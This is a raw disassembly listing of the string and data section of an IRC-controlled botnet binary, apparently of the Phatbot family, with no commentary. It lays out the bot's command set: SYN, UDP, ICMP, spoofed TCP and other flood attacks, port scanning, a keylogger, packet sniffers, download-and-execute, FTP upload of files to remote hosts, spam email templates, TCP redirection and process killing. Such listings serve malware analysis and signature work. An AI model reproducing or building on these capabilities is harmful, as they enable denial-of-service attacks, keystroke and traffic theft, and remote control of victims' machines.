aDownloadingUpd db '- Downloading update from: %s.',0
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_401ACD+69E3�o
align 10h
dword_42A6D0 dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_401ACD+6981�o
dd 7325203Ah, 0
unk_42A6EC db 2Dh ; - ; DATA XREF: sub_401ACD+6976�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 10h
unk_42A710 db 2Dh ; - ; DATA XREF: sub_401ACD+68DC�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToStar_1 db 'Failed to start search thread, error: <%d>.',0
unk_42A74C db 2Dh ; - ; DATA XREF: sub_401ACD+6866�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 4
dword_42A77C dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD:loc_40826C�o
; sub_401ACD:loc_409367�o
unk_42A788 db 2Dh ; - ; DATA XREF: sub_401ACD+678A�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_42A7AC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408235�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0
align 4
unk_42A7E4 db 2Dh ; - ; DATA XREF: sub_401ACD+675E�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToStar_2 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42A81C db 2Dh ; - ; DATA XREF: sub_401ACD+66EE�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
dword_42A848 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401ACD+666B�o
aFailedToStar_3 db '- Failed to start clone thread, error: <%d>.',0
align 4
dword_42A884 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401ACD+65FC�o
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 4
unk_42A8B4 db 2Dh ; - ; DATA XREF: sub_401ACD+6583�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToStar_4 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42A8EC db 2Dh ; - ; DATA XREF: sub_401ACD+6514�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0
align 4
unk_42A91C db 2Dh ; - ; DATA XREF: sub_401ACD+648A�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToStar_5 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_42A954 db 2Dh ; - ; DATA XREF: sub_401ACD+641B�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 4
unk_42A984 db 2Dh ; - ; DATA XREF: sub_401ACD+63A2�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToStar_6 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42A9BC db 2Dh ; - ; DATA XREF: sub_401ACD+6333�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_42A9F8 db 2Dh ; - ; DATA XREF: sub_401ACD+62BA�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToStartT db 'Failed to start transfer thread, error: <%d>.',0
align 4
unk_42AA38 db 2Dh ; - ; DATA XREF: sub_401ACD+624B�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadingUrl db 'Downloading URL: %s to: %s.',0
unk_42AA64 db 2Dh ; - ; DATA XREF: sub_401ACD+617C�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
unk_42AAA8 db 2Dh ; - ; DATA XREF: sub_401ACD+610D�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
unk_42AAE4 db 2Dh ; - ; DATA XREF: sub_401ACD+6010�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s:%d with delay: %d(ms).',0
align 10h
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_401ACD+5F64�o
align 10h
aSSS_2 db '[%s] * %s %s',0 ; DATA XREF: sub_401ACD+5E87�o
align 10h
dword_42AB40 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401ACD+5DF3�o
; sub_401ACD+715B�o
unk_42AB4C db 2Dh ; - ; DATA XREF: sub_401ACD+5D8F�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_7 db 'Failed to start scan thread, error: <%d>.',0
align 4
unk_42AB88 db 2Dh ; - ; DATA XREF: sub_401ACD+5D20�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStar_0 db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 4
unk_42ABD8 db 2Dh ; - ; DATA XREF: sub_401ACD+5C89�o
; sub_401ACD+607F�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_8 db 'Failed to start scan thread, error: <%d>.',0
align 10h
unk_42AC10 db 2Dh ; - ; DATA XREF: sub_401ACD+5C1A�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSPortScanStart db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m'
db 'inutes using %d threads.',0
align 4
unk_42AC78 db 2Dh ; - ; DATA XREF: sub_401ACD+5AA4�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_9 db 'Failed to start scan, no IP specified.',0
align 4
unk_42ACAC db 2Dh ; - ; DATA XREF: sub_401ACD+5A47�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_10 db 'Failed to start scan, port is invalid.',0
align 10h
unk_42ACE0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4073F4�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s failed.',0
align 10h
unk_42AD10 db 2Dh ; - ; DATA XREF: sub_401ACD+5920�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s',0
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_401ACD+5907�o
aSS_3 db '-s:%s',0 ; DATA XREF: sub_401ACD+58F0�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_401ACD+58CD�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aAb db 'ab',0 ; DATA XREF: sub_401ACD+58A9�o
; sub_411C14+4E�o
align 10h
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_401ACD+5898�o
align 10h
unk_42AD80 db 2Dh ; - ; DATA XREF: sub_401ACD+584E�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 10h
aUpload db 'upload',0 ; DATA XREF: sub_401ACD+582B�o
align 4
unk_42ADA8 db 2Dh ; - ; DATA XREF: sub_401ACD+57F5�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aAlreadyDScanni db 'Already %d scanning threads. Too many specified.',0
align 4
unk_42ADE8 db 2Dh ; - ; DATA XREF: sub_401ACD+5798�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToSta_11 db '- Failed to start flood thread, error: <%d>.',0
align 10h
unk_42AE20 db 2Dh ; - ; DATA XREF: sub_401ACD+572D�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
unk_42AE68 db 2Dh ; - ; DATA XREF: sub_401ACD+567C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 4
unk_42AE9C db 2Dh ; - ; DATA XREF: sub_401ACD+5648�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 10h
unk_42AED0 db 2Dh ; - ; DATA XREF: sub_401ACD+5624�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 4
unk_42AF08 db 2Dh ; - ; DATA XREF: sub_401ACD+5582�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_401ACD+5565�o
align 4
unk_42AF5C db 2Dh ; - ; DATA XREF: sub_401ACD+5550�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToSta_12 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42AF94 db 2Dh ; - ; DATA XREF: sub_401ACD+54E1�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
unk_42AFDC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406F00�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0
align 4
unk_42B014 db 2Dh ; - ; DATA XREF: sub_401ACD+5429�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_13 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_42B04C db 2Dh ; - ; DATA XREF: sub_401ACD+53AF�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 10h
aNormal db 'Normal',0 ; DATA XREF: sub_401ACD+539F�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_401ACD+5398�o
unk_42B090 db 2Dh ; - ; DATA XREF: sub_401ACD+52FD�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 4
aRandom_0 db 'random',0 ; DATA XREF: sub_401ACD+52ED�o
; sub_413E36+312�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_401ACD+52D6�o
; sub_413E36+2F2�o
aHcon db 'hcon',0 ; DATA XREF: sub_401ACD+5260�o
align 10h
aHttpcon db 'httpcon',0 ; DATA XREF: sub_401ACD+524D�o
unk_42B0D8 db 2Dh ; - ; DATA XREF: sub_401ACD+51FE�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 4
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_401ACD+518A�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
aEmail db 'email',0 ; DATA XREF: sub_401ACD+509F�o
align 10h
aTcp db 'tcp',0 ; DATA XREF: sub_401ACD+5088�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_401ACD+5071�o
align 10h
aP: ; DATA XREF: sub_401ACD+505A�o
; UPX0:00438308�o ...
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_401ACD+5043�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_401ACD+502C�o
align 4
aNs db 'ns',0 ; DATA XREF: sub_401ACD+5015�o
align 4
aNetsend db 'netsend',0 ; DATA XREF: sub_401ACD+4FFE�o
aU: ; DATA XREF: sub_401ACD+4FE7�o
; UPX0:00438300�o ...
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_401ACD+4FD0�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_401ACD+4FB9�o
align 4
aAdv db 'adv',0 ; DATA XREF: sub_401ACD+4FA2�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_401ACD+4F8B�o
aPsc db 'psc',0 ; DATA XREF: sub_401ACD+4F74�o
aPortscan db 'portscan',0 ; DATA XREF: sub_401ACD+4F5D�o
align 4
aC_a db 'c_a',0 ; DATA XREF: sub_401ACD+4F37�o
aC_action db 'c_action',0 ; DATA XREF: sub_401ACD+4F20�o
align 4
aC_pm db 'c_pm',0 ; DATA XREF: sub_401ACD+4F09�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_401ACD+4EF2�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_401ACD+4EDB�o
align 4
aScan db 'scan',0 ; DATA XREF: sub_401ACD+4EC4�o
align 4
aRd db 'rd',0 ; DATA XREF: sub_401ACD+4EAD�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_401ACD+4E96�o
align 4
aJpl10 db 'jpl10',0 ; DATA XREF: sub_401ACD+4E7F�o
align 4
aJpldg10 db 'jpldg10',0 ; DATA XREF: sub_401ACD+4E68�o
aWonk db 'wonk',0 ; DATA XREF: sub_401ACD+4E51�o
align 4
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_401ACD+4E3A�o
align 4
dword_42B218 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401ACD+4E2D�o
aFailedToSta_14 db '- Failed to start flood thread, error: <%d>.',0
align 4
dword_42B254 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401ACD+4DBE�o
aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0
aSkysyn db 'skysyn',0 ; DATA XREF: sub_401ACD+4D3B�o
align 4
aSyn db 'syn',0 ; DATA XREF: sub_401ACD+4D24�o
; sub_401ACD+52BE�o ...
aSynflood db 'synflood',0 ; DATA XREF: sub_401ACD+4D0D�o
align 4
unk_42B29C db 2Dh ; - ; DATA XREF: sub_401ACD+4D00�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFailedToSta_15 db '- Failed to start flood thread, error: <%d>.',0
align 4
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_401ACD+4C29�o
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_401ACD+4C12�o
; sub_412B09:loc_412C35�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_401ACD+4BFB�o
; sub_412B09:loc_412C19�o
align 10h
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_401ACD+4BE4�o
; sub_412B09+F1�o
align 4
aC: ; DATA XREF: sub_401ACD+4BCD�o
; UPX0:00438338�o ...
unicode 0, <c>,0
aClone_0 db 'clone',0 ; DATA XREF: sub_401ACD+4BB6�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_401ACD+4B8D�o
align 10h
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_401ACD+4B76�o
align 4
aMv db 'mv',0 ; DATA XREF: sub_401ACD+4B5F�o
align 10h
aRename db 'rename',0 ; DATA XREF: sub_401ACD+4B48�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_401ACD+4B31�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_401ACD+4B1A�o
align 4
aE: ; DATA XREF: sub_401ACD+4B03�o
; UPX0:004382F0�o ...
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_401ACD+4AEC�o
aJp10 db 'jp]10',0 ; DATA XREF: sub_401ACD+4AD5�o
align 4
aJpDe10 db 'jp]de10',0 ; DATA XREF: sub_401ACD+4ABE�o
aDe db 'de',0 ; DATA XREF: sub_401ACD+4AA7�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_401ACD+4A90�o
align 10h
aRp db 'rp',0 ; DATA XREF: sub_401ACD+4A79�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_401ACD+4A62�o
; sub_401ACD+6BE8�o
align 4
aTsn db 'tsn',0 ; DATA XREF: sub_401ACD+4A4B�o
aTsunami db 'tsunami',0 ; DATA XREF: sub_401ACD+4A34�o
aT3 db 't3',0 ; DATA XREF: sub_401ACD+4A1D�o
align 4
aTarga3 db 'targa3',0 ; DATA XREF: sub_401ACD+4A06�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_401ACD+49EF�o
aC_part db 'c_part',0 ; DATA XREF: sub_401ACD+49D8�o
align 10h
aC_j db 'c_j',0 ; DATA XREF: sub_401ACD+49C1�o
aC_join db 'c_join',0 ; DATA XREF: sub_401ACD+49AA�o
align 4
aC_n db 'c_n',0 ; DATA XREF: sub_401ACD+4993�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_401ACD+497C�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_401ACD+4965�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_401ACD+494E�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_401ACD+4937�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_401ACD+4920�o
align 10h
aM: ; DATA XREF: sub_401ACD+4909�o
; UPX0:00438348�o ...
unicode 0, <m>,0
aCy db 'cy',0 ; DATA XREF: sub_401ACD+48DB�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_401ACD+48C4�o
align 10h
aA: ; DATA XREF: sub_401ACD+48AD�o
; UPX0:0043830C�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_401ACD+4896�o
align 4
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_401ACD+4868�o
aAa db 'aa',0 ; DATA XREF: sub_401ACD+4851�o
align 4
aAddalias db 'addalias',0 ; DATA XREF: sub_401ACD+483A�o
align 4
aKl db 'kl',0 ; DATA XREF: sub_401ACD+4823�o
align 4
aKilllog db 'killlog',0 ; DATA XREF: sub_401ACD+480C�o
aGh db 'gh',0 ; DATA XREF: sub_401ACD+47E3�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_401ACD+47CE�o
aCap db 'cap',0 ; DATA XREF: sub_401ACD+47B9�o
aCapture db 'capture',0 ; DATA XREF: sub_401ACD+47A4�o
unk_42B428 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406266�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
unk_42B444 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40625C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 4
aSend db 'send',0 ; DATA XREF: sub_401ACD+475F�o
; sub_409B13+5F0�o
align 10h
unk_42B470 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40621F�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 10h
unk_42B490 db 2Dh ; - ; DATA XREF: sub_401ACD+4748�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_42B4B0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406194�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 10h
unk_42B4D0 db 2Dh ; - ; DATA XREF: sub_401ACD+46BD�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 4
aShare db 'share',0 ; DATA XREF: sub_401ACD+466F�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_401ACD+462B�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_401ACD+4611�o
align 10h
aStop db 'stop',0 ; DATA XREF: sub_401ACD+45F7�o
align 4
unk_42B518 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4060B7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
unk_42B538 db 2Dh ; - ; DATA XREF: sub_401ACD+45E0�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 4
aStart db 'start',0 ; DATA XREF: sub_401ACD+45AA�o
align 4
unk_42B564 db 2Dh ; - ; DATA XREF: sub_401ACD+4578�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
aNet db 'net',0 ; DATA XREF: sub_401ACD+4554�o
dword_42B5A0 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+4549�o
aFailedToStartL db '- Failed to start logging thread, error: <%d>.',0
align 4
dword_42B5DC dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+44DA�o
aKeyLoggerActiv db '- Key logger active.',0
align 10h
dword_42B600 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+4458�o
aAlreadyRunning db '- Already running.',0
align 10h
dword_42B620 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD:loc_405F0F�o
aNoKeyLoggerThr db '- No key logger thread found.',0
align 4
dword_42B64C dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+4438�o
aKeyLoggerStopp db '- Key logger stopped. (%d thread(s) stopped.)',0
align 4
aFile db 'file',0 ; DATA XREF: sub_401ACD+43F9�o
align 10h
aKeylog db 'keylog',0 ; DATA XREF: sub_401ACD+43D7�o
align 4
dword_42B698 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD:loc_405E99�o
aNoThreadFound_ db '- No thread found.',0
align 4
dword_42B6B8 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+43C2�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 10h
dword_42B6F0 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4392�o
aFailedToSta_16 db '- Failed to start server, error: <%d>.',0
align 4
dword_42B724 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4345�o
aServerRunnin_0 db '- Server running on Port: 113.',0
align 10h
dword_42B750 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4335�o
aAlreadyRunni_0 db '- Already running.',0
align 10h
aIdent db 'ident',0 ; DATA XREF: sub_401ACD+4302�o
align 4
unk_42B778 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_405DC4�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoPhatbotSniff db '- No Phatbot sniffer thread found.',0
unk_42B7A8 db 2Dh ; - ; DATA XREF: sub_401ACD+42ED�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotSniffer db '- Phatbot sniffer stopped. (%d thread(s) stopped.)',0
unk_42B7E8 db 2Dh ; - ; DATA XREF: sub_401ACD+42BD�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_17 db '- Failed to start sniffer thread, error: <%d>.',0
unk_42B824 db 2Dh ; - ; DATA XREF: sub_401ACD+424E�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotPacketS db '- Phatbot packet sniffer active.',0
align 4
unk_42B854 db 2Dh ; - ; DATA XREF: sub_401ACD+41E7�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_1 db '- Already running.',0
aSniffer db 'sniffer',0 ; DATA XREF: sub_401ACD+41B0�o
dword_42B87C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD:loc_405C72�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 4
dword_42B8A8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+419B�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 4
dword_42B8E4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+416B�o
aFailedToSta_18 db '- Failed to start sniffer thread, error: <%d>.',0
align 10h
dword_42B920 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+40FC�o
aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 10h
dword_42B950 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+4095�o
aAlreadyRunni_2 db '- Already running.',0
align 10h
aOn db 'on',0 ; DATA XREF: sub_401ACD+4075�o
; sub_401ACD+41C7�o ...
align 4
aPsniff db 'psniff',0 ; DATA XREF: sub_401ACD+405E�o
align 4
aRf db 'rf',0 ; DATA XREF: sub_401ACD+4049�o
align 10h
aReadfile db 'readfile',0 ; DATA XREF: sub_401ACD+4034�o
align 4
aCm db 'cm',0 ; DATA XREF: sub_401ACD+401F�o
align 10h
aCmd db 'cmd',0 ; DATA XREF: sub_401ACD+400A�o
aMirc db 'mirc',0 ; DATA XREF: sub_401ACD+3FF5�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_401ACD+3FE0�o
aV: ; DATA XREF: sub_401ACD+3FCB�o
; UPX0:0043833C�o ...
unicode 0, <v>,0
aVisit db 'visit',0 ; DATA XREF: sub_401ACD+3FB6�o
align 10h
aLi db 'li',0 ; DATA XREF: sub_401ACD+3FA1�o
align 4
aList db 'list',0 ; DATA XREF: sub_401ACD+3F8C�o
align 4
aGt db 'gt',0 ; DATA XREF: sub_401ACD+3F77�o
align 10h
aDel db 'del',0 ; DATA XREF: sub_401ACD+3F4D�o
aDelete db 'delete',0 ; DATA XREF: sub_401ACD+3F38�o
; sub_401ACD+4645�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_401ACD+3F23�o
align 10h
aKill db 'kill',0 ; DATA XREF: sub_401ACD+3F0E�o
align 4
aKp db 'kp',0 ; DATA XREF: sub_401ACD+3EF9�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_401ACD+3EE4�o
align 4
aDn db 'dn',0 ; DATA XREF: sub_401ACD+3ECF�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_401ACD+3EBA�o
aSe db 'se',0 ; DATA XREF: sub_401ACD+3EA5�o
align 4
aO: ; DATA XREF: sub_401ACD+3E7B�o
; UPX0:0043866C�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_401ACD+3E66�o
; sub_401ACD+590C�o ...
align 10h
aPr db 'pr',0 ; DATA XREF: sub_401ACD+3E51�o
align 4
aPrefix db 'prefix',0 ; DATA XREF: sub_401ACD+3E3C�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_401ACD+3E27�o
align 4
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_401ACD+3E12�o
align 10h
aC_q db 'c_q',0 ; DATA XREF: sub_401ACD+3DFD�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_401ACD+3DE8�o
align 4
aK: ; DATA XREF: sub_401ACD+3DD3�o
; UPX0:00438328�o ...
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_401ACD+3DBE�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_401ACD+3D94�o
aPt db 'pt',0 ; DATA XREF: sub_401ACD+3D7F�o
align 4
